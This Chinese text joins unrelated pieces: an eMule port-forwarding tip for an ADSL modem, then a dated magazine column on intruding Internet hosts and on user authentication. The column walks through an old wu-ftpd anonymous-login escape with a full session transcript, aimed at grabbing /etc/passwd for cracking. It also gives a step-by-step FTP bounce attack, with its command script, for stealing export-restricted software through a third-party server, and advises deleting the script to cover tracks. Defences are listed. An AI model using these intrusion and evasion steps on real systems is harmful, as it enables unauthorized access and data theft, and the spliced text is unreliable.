EM老是跑在低ID上,着实让人心急,看了很多帖子,我终于明白,使用全创AL1100-11(白色)被设置成路由的我要进行端口的映射,找来找去没找到完全符合的帖子,也有很多朋友在找,经过一番摸索,终于实现了高ID的梦想,现在将经验和大家一起分享,也让使用全创ADSLMODEM的朋友和我一样愉快的赶骡。
在IE地址栏里键入
http://192.168.0.2,如果你没改动过,用户名和密码应该分别为:admin;12345678。
在“配置”栏里点击“虚拟服务器”,在“公共端口”、“私有端口”处都填上“4662”,“端口类型”选择TCP,主机IP地址填上你机器的静态IP地址,然后点击“添加此设置”。
还是在“配置”栏,点击“保存设置”,点击“提交”,等待MODEM重新启动,然后启动你的骡子,看看你的ID状态,肯定让你兴奋!!!
如何入侵一台Internet上的主机
在网路上受到攻击是难免的,虽说道高一尺,魔高一丈,
对于网路上的主机,还是得小心防治才是。
■黄力尧
敬告读者:为避免有心人士以本期讲解之方式入侵他人系统,
入侵方式之关键技术部份并不予以详细说明,仅讲解其流程。
而且内容并未讲解如何避免他人追查入侵者之方式,若是贸然使用
这些方式入侵他人系统很有可能被抓到,请读者不要轻易尝试。
一台网路上的电脑所可能面临之网路入侵
上期本专栏曾讲解过密码学概论以及其破解方式,本期专栏将为您
讲解要如何入侵一台Internet上的主机。当一个入侵者要侵入(或破坏)
一台网路上的主机时,一般会由下列几种方式达成他的目的:
1.找出该网路主机上的伺服程式是否设计缺陷并有可供入侵之处。
2.找出该网路主机所使用的通信协定是否有先天上的安全漏洞。
3.藉由某种手段使该网路主机瘫痪。
4.困扰对方主机上的系统管理员或使用者,降低对方工作能力。
因为这些攻击都是从网路上来的,因此如果您或您的公司要避免
受到这些攻击,最简单又快速的方法就是去五金行买把大榔头,
然后对准您的Router或是Modem给它一槌,或是拿把大剪刀把网路线给剪了,
保证全世界最厉害的hacker也拿您的电脑没法子,从此您再也不用担心
网路安全方面的问题(只是可能您也没网路可用了)。
下面将就这几种情况分别予以说明,并有入侵实际过程与入侵原理解说,
并说明其防治方式。
利用伺服程式的缺陷入侵系统
FTP入侵:wu-ftpd2.x版以前安全缺陷(其版次在此不公开)。
wu-ftpd是WashingtonUniversity(美国华盛顿大学)所研发出来的FTP伺服程式,
广泛应用在各型UNIX主机上作为FTP伺服程式.它可以接受一般的用户签入,
也提供以Anonymous或ftp为名的匿名签入以开放主机上的公开档案供大众
Download用。其2.2版本以前有一个很严重的安全缺陷:一个匿名的使用者
经由下列程序也可以取得一般使用者的权限以进入系统磁盘:
1.以任何一个FTPClient端程式连线到使用wu-ftpd2.x版以前架设的FTP站台。
2.要求签入时,使用匿名帐号签入,但不要使用anonymous而使用FTP。
3.在根目录下再次使用chdi/(cd/)命令,即可切换到一般系统目录而不只是
公众目录。
现在在此示范如何入侵网路上的一台please.hack.me主机,实例如下:
(中文部份为注解)
linux1:~#ftpplease.hack.me
Connectedtoplease.hack.me
220hackFTPserver(Versionwu-2.x(x)SunMay14:57:12CDT1993)ready.
Name(linux1.twunix.org:root):ftp
331Guestloginok,sendyourcompletee-mailaddressaspassword.
Password:
230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany
230-unusualproblems,pleasereportthemviae-mailtoroot@please
230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
230-ofyourpassword--thiswillturnoffthecontinuationmessagesthatmay
230-beconfusingyourftpclient.
230-
230Guestloginok,accessrestrictionsapply.
RemotesystemtypeisUNIX.
Usingbinarymodetotransferfiles.
ftp>ls-l一般匿名帐号进入后,先查看所在目录内容
200PORTcommandsuccessful.
150OpeningASCIImodedataconnectionfor/bin/ls.
total9
drwxrwxr-x8rootwheel1024Sep1109:31.
drwxrwxr-x8rootwheel1024Sep1109:31..
drwxrwxr-x2rootwheel1024Sep1109:31bin
drwxrwxr-x2rootwheel1024Sep1109:31etc
drwxrwxr-x2rootwheel1024Dec31993incoming
drwxrwxr-x2rootwheel1024Nov171993lib
drwxrwxr-x2rootwheel1024Sep1109:31pub
drwxrwxr-x3rootwheel1024Sep1109:31usr
-rw-r--r--1rootroot312Aug11994welcome.msg
226Transfercomplete.以一般匿名帐号进入后只能看到公众目录内容
ftp>pwd
257“/”iscurrentdirectory.
ftp>cd/虽然已经在根目录下,依然再次切换到/目录
250CWDcommandsuccessful.本来应该是要回应「无此目录」的
(因为已经在最底层)但是依然可以继续切换
ftp>ls-l再次查验现在目录内容
200PORTcommandsuccessful.
150OpeningASCIImodedataconnectionfor/bin/ls.
total777
drwxr-xr-x19rootroot1024Oct608:58.
drwxr-xr-x19rootroot1024Oct608:58..
drwxr-xr-x2rootbin2048Sep1117:31bin
drwxr-xr-x2rootroot1024Sep1117:35boot
drwxr-xr-x3rootroot20480Oct1400:03dev
drwxr-xr-x9rootroot2048Oct1410:41etc
drwxr-xr-x3rootroot1024Oct507:26ext
drwxr-xr-x2rootroot1024Sep1109:42floppy
drwxr-xr-x8rootroot1024Oct1111:52home
drwxr-xr-x3rootroot1024Sep1117:27lib
drwxr-xr-x2rootroot12288Sep1117:16lost+found
drwxr-xr-x2rootroot1024Jul1013:23mnt
dr-xr-xr-x5rootroot0Oct1408:03proc
-rw-------1rootroot139424Sep2817:00quota.user
drwxr-x--x3rootroot1024Sep2814:07root
drwxr-xr-x2rootbin2048Sep1117:31sbin
drwxr-xr-x2rootroot1024Sep1117:18shlib
drwxrwxrwt3rootroot1024Oct1410:40tmp
drwxr-xr-x24rootroot1024Jul81994usr
drwxr-xr-x14rootroot1024Sep1117:32var
-r--------1rootroot596263Sep1117:33vmlinuz
226Transfercomplete.已经变成一般系统目录了。
ftp>
入侵原理解说:
此一入侵乃是利用FTP公众匿名帐号anonymous,ftp其中后者的ftp正好与系统中
内定的FTP公众帐号目录名称相同,使得系统误以为ftp是一个已经登记的
用户而不是一个公众匿名帐号而使其进入系统目录中。
为什么会有这种现象发生呢?原来FTP伺服程式将连线进来的使用者分为
「匿名帐号」与「正式帐号」。如果是匿名帐号,则系统仅要求其输入
自己的E-Mail或是Ident资料当密码,就可以进入系统中的/home/ftp目录中,
而以/home/ftp当作此类使用者的根目录,这种用anonymous或是ftp当帐号匿名
签入的使用者是没有办法切到系统目录中的(实际的/目录),再怎么下
chdir/命令也只能到/home/ftp为止。
而如果是在/etc/passwd中登记有案的帐号,则以系统中实际的/为其根目录,
此类使用者可以在其权限范围内浏览整颗硬盘。
而因为匿名帐号是以/home/ftp目录为起点,正好与ftp此一匿名帐号相同,
故wu-ftpd2.x版以前的版本会将使用ftp签入的帐号亦视为一般User。
(不过如果是用anonymous此一匿名帐号签入,就不会有这种状况了)
使用ftp帐号并入侵到系统里面以后会有什么好处呢?由于该入侵者
已经可以完整浏览该硬盘,并享有一般User之权限,当然入侵者也可以进到/etc目录下,并读取passwd档案。如果该系统没有做shadow的话,那就可以大大方方地拿走passwd档案,然后回家利用类似上期本专栏所介绍之密码分析程式算出密码来。如果正好还破出root的密码的话,那就……
入侵防治方式:
1.如果你的ftp伺服程式是wu-ftpd而且版号低于2.4版,请尽快换到2.4版使用。
2.将ftp帐号列入/ftp/ftpusers档案中,让匿名使用者只能利用anonymous此一匿名帐号签入。
3.替系统安装ShadowPassword。
4.再次确认系统中没有叫做ftp或是anonymous的目录。
5.改/etc/inetd.conf档案,关闭FTP服务。
利用通信协定先天上的安全漏洞入侵系统
这次我们依然以FTP程式作为说明,讲解如何由FTP通信程式本身的漏洞来窃取某些敏感性资料。
FTPBounce跳跃攻击法
本范例将讲解如何经由FTP窃取到被限制传送的软体。某一位于美国的FTP主机,暂名为A主机,其IPAddress为a.a.a.a,在其中的/export-restrict目录中放有一禁止出口的密码程式crypt.tar.gz,此目录被设定为只要不是美国本土的主机连线,就无法取得/export-restrict目录中的任何档案。(注一)
现在在台湾有一台C主机,其IPAddress为c.c.c.c,C主机上有一个用户想要连线到A主机去Downloadcrypt.tar.gz这一个编密软体,但是A主机拒绝让C主机传送这个档案。因为A主机经由检查C主机的IPAddress之后,得知C主机并不位在美国,因此不让C主机download这个档案。但是A主机可以用同样的程序检查出哪些主机位于美国,并且让这些主机进去拿资料。
现在假设在美国有一台公众FTP主机,名为B主机,其IPAddress为b.b.b.b,此一B主机开放一个/upload目录让大家放档案上来和其他人分享,任何人都可以放档案到/upload里面,也可以删掉自己所放的档案。
C主机上的这一个用户很想要拿到这个编密软体,但是受限于出口禁令无法拿到这个档案。有一天他发现B主机上有一个/upload目录可以供大家上传shareware档案(亦即是一个大家都可读可写的目录),于是C主机上的这个用户想出了个好点子,利用FTPBounce跳跃攻击法,把B主机当作中介主机来偷到A主机上的crypt.tar.gz档案。
1.首先,该用户以自己机器的真实IPAddress(不能用localhost或是127.x.x.x)连上自己的机器:
linux1:~#ftp168.95.109.222
Connectedto168.95.109.222.
220linux1FTPserver(Versionwu-2.4(4)SunJun2222:47:03CDT1997)ready.
Name(localhost:root):user1
331Passwordrequiredforuser1.
Password:
230Useruser1loggedin.
RemotesystemtypeisUNIX.
Usingbinarymodetotransferfiles.
2.接下来,使用quote指令将FTP内部命令pasv传送给FTP伺服程式,
使其进入被动模式(PassiveMode)
ftp$quotepasv
227EnteringPassiveMode(168,95,109,222,5,243)
刚刚要您使用真实IPAddress连上自己机器而不要用localhost用意即在此,
如果你用localhost连上,则通信是藉由loopback介面来传送,
而不是真实的网路介面,无法得知进入passivemode以后所使用的通信
Port号码。如果用了localhost就会变这样:
ftp$quotepasv
227EnteringPassiveMode(127,0,0,1,5,243)
得到这个资讯对我们一点帮助都没有。现在将您刚刚使用pasv
命令所得到的IP位址以及Port数目抄下来,稍后应用(就是168,95,109,222,5,243)。
3.再使用一次quote命令,送出stor指令,并指定要存一个新档案“foo”。
(foo是惯用字,你可以自己取别的名字)
4.现在你的FTP程式应该已经停掉了,暂时别理它(但是别把连线切断,
就让它保持这样)
5.用文字编辑器编辑如下的档案(是一个指令稿,让我们能够遥控B主机
做我们想要做的动作,就好像是我们直接在B主机上操作一个FTPClient程式
一样,右右括号为其解说,编辑时不用打上去):
完成后,将此一档案定一个你喜欢的名字。在这边我们使用command为名称。
6.现在再用FTP连线到B主机去,然后用匿名使用者登录,并且切换到/upload
目录去。刚刚我们已经讲过,B主机的/upload目录是供使用者上传Shareware
或其他资料用的,因此任何人都可以在这边写入资料。现在先使用put
指令将刚刚写好的指令稿command上传到B主机的/upload目录中
(cd/upload;putcommand)。
7.在B主机上再次使用quote命令送出“porta,a,a,a,0,21”这就是A主机的
IPAddress,而且我们指定用21号的Port来传送资料。
8.现在继续使用quote指令送出“retrcommand”将command指令稿的内容列出,
其结果将会变为执行该档案内容。
9.由于command档案中指挥B主机去A主机抓资料(第7步骤时已经将B主机和A
主机连结),而A主机由于从IPAddress查出B主机为美国境内的主机,
因此允许来自B主机的抓档请求。
10.现在检查第三步骤所产生的‘foo’档案,现在应该已经变为crypt.tar.gz,
此一档案之内容,资料窃取成功。
入侵原理解说
由于本例中的A主机不接受美国以外地区的主机撷取关于密码的资料,
因此我们透过一台同样位于美国且具有一个公众目录的B主机来帮我们
抓资料。其关键技术在于利用了B主机的「远端执行」能力,
藉由预先写好的指令稿遥控B主机,为我们到A主机上去抓到我们想要的
资料。
userftp(以ftp为使用者签入,变为匿名使用者)
pass-anonymous@(密码用anonymous,并且在前面加上1‘-’
将对方伺服器(就是稍后要连接的A主机)的显示讯息关掉,避免发生问题。
后面加上@让它看起来比较像是一个E-MailAddress)
cwd/export-restrict(切换到/export-restrict目录)
typei(切换到二进位模式来传送非文字档案)
port168,95,109,222,5,243(将B主机和C主机之间建立一条连线通道,此处
168,95,109,222,5,243就是在第二步骤时所得到之C主机IPAddress与PortNumber)
retrcrypt.tar.gz(叫出crypt.tar.gz内容(就是一般拿取档案时的动作)
quit(结束连线)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......(此部份需要满60KBytes,
将双边机器的TCP视窗填满,以避免FTP的控制连接过早被中断。
要注意的是,此一60K左右的无意义资料一行最多250字元时就必须换行,
以免在某些机器上被拒绝。)
而在我们自己的C主机上所使用的ftp程式,其实并不实际做FTP资料的动作,
而只是用来做资料收听而已。我们使用pasv指令以后就会进入FTP程式的
被动模式(PassiveMode),FTP程式将不再主动撷取资料而是进入被动接收资料
的状态。FTP程式在进入被动模式以后会回应一个Port数给我们,
就是上例中的168,95,109,222,5,243。此Port即为进入PsssiveMode以后FTP程式
所收听资料用的Port,如果读者手边有其他能监听指定Port并将收听到的资料
写入档案的工具程式的话,也可以拿来应用,并不一定要用FTP程式,
只是FTP程式人人有,不劳您另外费心寻找一个监听程式。接着,
再送一个stor命令,并指定档名,则指定Port上收听到的资料都会存到
此一档案中。
在第五步骤中所编辑的指令稿,其实就是若我们想要直接到A主机上
去抓编密软体时所会下的指令,但是由于A主机并不允许我们直接去抓,
只好透过一个能到A主机抓资料,且能听从我们指令的主机来代劳,
那就是B主机了。FTPBounce跳跃攻击法的技术重点就在此。
利用一台中介主机帮我们抓资料,但是资料不实际存到中介主机上,
直接送到我们这边来;这就好像是一个跳板一样,我们踩着跳板
到达我们的目的地,但是跳板并不是我们的目标,而且跳板用完以后
就没用了。
而要成为一个可资我们利用的中介主机,必须具备下列两个条件:
1.有一个公众目录,可读可写,用来让我们放入指令稿。
2.可以接受远端执行的动作。
这种主机实在是太多了,像是淡江、东海等大学的AnonymousFTPServer
都有提供一个/incoming或是/upload目录,让大家upload东西上来跟大家分享,
这同时也造就了FTPBounce跳跃攻击法实行成功的绝佳场所。
而远端执行不一定每台FTP主机都能做,因为有些系统管理员怕困扰,
把这项功能关掉了。(故非不能也,实不为也)早期的ftpd程式甚至可以
作一些在Shell下才能做的事情,岂不是很可怕?还有每台主机的指令参数
之使用方法会因为FTPServer程式而略有不同,建议先使用quotehelpport命令
查一下该主机的port命令到底要怎么下才适当,以免无法实行。
而我们将指令稿放上B主机后,先在B主机上以port命令指挥其连上A主机
(porta,a,a,a,0,21),再以指令稿中的内容指挥其登录A主机,
进入A主机存放编密软体的目录。进入目标所在目录后,
再用一次port命令使B主机与自己的C主机连结,然后下retr指令列出
crypt.tar.gz档案内容,由于A、C主机经由以上步骤已经算是透过B主机
连在一起,(还记得前面曾经让C主机上的FTP程式保持在某一Port上的
监听状态?)故只要B主机将A主机上的crypt.tar.gz档案内容给show出来,
马上就会被C主机上的FTP监听程式截取下来,于是crypt.tar.gz就到了
我们手上了。
传送完成以后,记得要清理一下垃圾,把我们放到B主机上的command档案
删掉,以免行迹败露。
接着说明command指令稿中最后附上的一大串AAAAAAAAAAA……的意义。
其实那只是一堆垃圾,随便你填些什么东西都可以,
主要用意在使A主机与B主机之间的连线不要太快关闭,
一个FTP程式共采用两个Port来通信:20与21两个Port,一个是资料通道,
一个是控制通道。FTP指令透过Port21来下,而实际上资料是经由20号
Port来送,要完成FTP资料传送,此两者缺一不可。如果你只用21号port来连,
但是实际上没有20号的资料通道,就算能下命令也没办法读到对方主机上
的资料,来看下面的范例:
linux1:/etc#telnetlocalhost20
Trying127.0.0.1......
telnet:Unabletoconnecttoremotehost:Connectionrefused
(用20号资料传送Port无法进入,只能用21号的控制命令Port进入)
linux1:/etc#telnetlinux1.twunix.org21
Trying10.1.1.1......
Connectedtolinux1.twunix.org.
Escapecharacteris‘^]’.
220linux1FTPserver(Versionwu-2.4(4)SunJun2222:47:03CDT1997)ready.
userroot
331Passwordrequiredforroot.
pass******
230Userrootloggedin.
list
425Can’tbuilddataconnection:Connectionrefused
因为我们实际上是用telnet来连接FTPServer,故只用到21号控制命令通道,
而没有实际的资料连接,虽然可以Login的进去,但是无法抓到资料。
上例中当我们要下list指令列出该主机上的资料时,因为没有资料通道连接
所以无法实行。
在FTPBounce跳跃攻击法的指令稿中,最后会作一个quit的动作以结束连线,
但是这是一个指令稿,所有的指令是一次送上,并非像我们平常在
使用FTP抓资料时是一步一步下命令,一定是先抓完档案才会quit,
所以很有可能在刚下retr指令,资料没传完之前就先把连线给断了。
为此我们在指令稿后面放上一大堆的垃圾,将双边主机的TCPWindow
(TCP资料框)给塞满,用以干扰TCP资料流处理程式使其不要那么快把
资料连线给断掉,一般的TCPWindow大概有25K-30K左右的大小,
为了保险起见,我们采用最大的30K,且乘以二
(因为在一条资料路径上有两台主机),后面用以干扰TCP资料流处理程式
而附上的字串每行不要超过250个字元,否则有些FTPServer会将整个指令稿
视为无效资料而丢弃,就无法发挥作用了。
而FTPBounce攻击法只能拿来偷限制出口的资料吗?事实上,只要一台
AnonymousFTP主机设定不妥当,安全漏洞多的话,利用/upload目录可以玩的花样
还更多,除了入侵外,还可以偷别人资料或是把别人的主机给Crash掉,
而且类似的技巧也可以应用在发送根本没有办法查出来源的信件与News,
干扰他人主机效能等。
入侵防治方式:
FTPBounce攻击法因为是藉由TCP/IP上FileTransferProtocol本身的漏洞来达成,
除非你不用TCP/IP通信协定,不然都将会遭到FTPBounce或其衍生攻击方式
的攻击,可以做的防治措施如下:
1.避免自己的主机上有会受入侵的服务(干脆把FTP给关了)。
2.不使用TCP/IP通信协定。
而FTPBounce攻击法的中心思想乃是利用防密不周严的主机当中介主机
(也就是替死鬼)来帮自己作破坏行为,别人到时候被入侵了可能抓不到
始作俑者就拿您开刀,因此您可以采用下列措施避免自己的主机变成
替死鬼:
1.不要提供FTP服务,或是仅提供限定功能的FTP(如TIS-FirewallKit之ftpd)。
2.不要开放/upload目录,有时太热心公益也是一种错误(所谓「好心被雷亲」)。
本期专栏因受限于篇幅,在此先告一段落。(注二)网路入侵方式的第三,
四项将在下期专栏讲解。内容有电子邮件伪造与其原理,
如何偷看到其他主机的网路与执行状态,由其他服务得到更多有用的
入侵参考资讯等。如果您真的对系统安全细节有兴趣,欢迎参加我们的
课程或与笔者联络。(作者E-Mail:variox01@ms1.hinet.net)
注一:按美国有密码软体出口禁令,凡是只要牵扯到有关密码的特定程式
都禁止输出。通常禁止出口的都是那些较高难度的密码程式,
简单的密码程式是可以出口的。
注二:本期专栏所列举之入侵方式,部份关键技术已经抽掉,
以避免有心人士滥用在不正当的用途上,只是让您了解入侵方式的概念
与大略方式。因此,如果你不能在您的主机上实行,那是正常的。
上期本专栏曾经提过一般电脑上的使用者宣告与认证方式,
但是受限于篇幅未讲解其他的认证方式,在此特别补述。
电脑系统如何辨识使用者,称为「认证」(Authentication)方式,
包括了使用者身分的宣告与使用者身分确认。前者可用身分表示帐号
或物件,后者认证方式包括密码,生物认证与个人习惯等。
生物认证(BiologicalAuthentication)
生物认证采用每一生物所独有(Unique)之特征以兹识别独立生物个体,
所采用之认证条件必须每一生物个体都不同。生物认证经常采用的方式有:
1.指纹
每个人的指纹都不一样,藉由小型的影像扫描器就可以得到受测者的指纹,
分析后得知是否确实为某人。又由于人类皮肤层会分泌出特别的分泌物,
且会遗留在物体上,早已广泛应用在犯罪追踪上。
2.视网膜
人类视网膜的血管分布亦是每个人都不同,要求受测者目视高解析摄影机,
藉此得到某人的视网膜分布状况来辨别身分。
3.声音
每个人说话的频率、音品、波形均不同,可藉此辨认身分。
但可能因为个人当时身体状况(如感冒、喉痛声哑)而改变声音,
通常会搭配其他方式做辨认,不独立使用。
除了以上的几种方式,其实人身上还有很多独特且可资辨认的地方,
如DNA(细胞遗传物质)、血液、分泌物等。但因为使用这些方式做认证
有其实行上的不便利之处(没有人想要每用一次电脑就得抽一次血吧?)
因此较少采用。
个人习惯(PersonalCustomary)
此类身分认证方式藉由每个人习惯的差异来辨认每个使用者,
通常会和其他认证法搭配使用,以增加认证的可靠性。
1.按键节拍侦测(KetstrokeRhythmSensing)
这是最常用的个人习惯身分认证法,需与密码输入身分认证
一起搭配使用。通常的情况,一个人除非经常改密码,
否则对于每天都要输入一次,乃至于十几次的密码应该是再熟悉也不过了,
就算是多复杂的密码,连续打了几天以后应该也会记牢了。
(如果这样还记不起来,就应该去找医生检查一下自己的头有没有烧坏了)
一个已经熟悉自己密码的人,在键盘上输入起密码来理当是很快的,
不会有还要临时停顿下来找某个键在哪里的情况发生。各位读者可以
试着在自己的键盘上输入下面的字串:
3Prlxu7x&`?
看看要花多久的时间,而且按键的过程中不能按错键喔!这组字串中
混合了大小写,符号以及数字,需要充分的运用到键盘一般字元区
各个角落的按键。如果你能在两秒钟之内按完这组字串而且不出错,
就表示你已经算是「熟悉」了这组字,和自己第一次输入这组字的
时间比比看,差了多久的时间?上面的例子就是让各位读者了解,
熟悉一组字的人和不熟悉的人输入字会有什么样的差异。
而除了输入时间的差异外,输入字的节拍也会因人而有差异。
尤其像上面例子中,每个字元之间在键盘分布的位置都不同,
有人打字可能比较偏重右手,也有人偏重左手,甚至刚学电脑的人
也可能会用「一指神功」来打字。这几种打字方法造成每个人输入每个
字元之间的时间都会有些微的差距,这就是打字的节拍,电脑藉由记录
每个人打字时每个字元的秒差来辨认每个人,密码的真正主人可以在输入
密码的某两个字元之间故意放慢速度,其他人很难知道此项只有本人才
知道的差异。这样就算密码被偷了,入侵者也无法通过按键节拍侦测这
一关。
2.个人签名(PersonalSignature)
同样是写一个字,每个人写出来的样子都不同,除了字型以外,
写字时施力度的大小,写字速度等也会有差异,和按键节拍侦测一样是
一种采用个人习惯来辨认身分的方式。平常写字的字迹可以被模仿,
或是影印下来使用,但是写字时施力大小与写字时每一笔每一划的速度
就不是每个人都模仿得来的了。使用个人签名认证的电脑会提供一支光笔,
可能会附上压力感应以侦测写字时候所施予笔上压力的大小。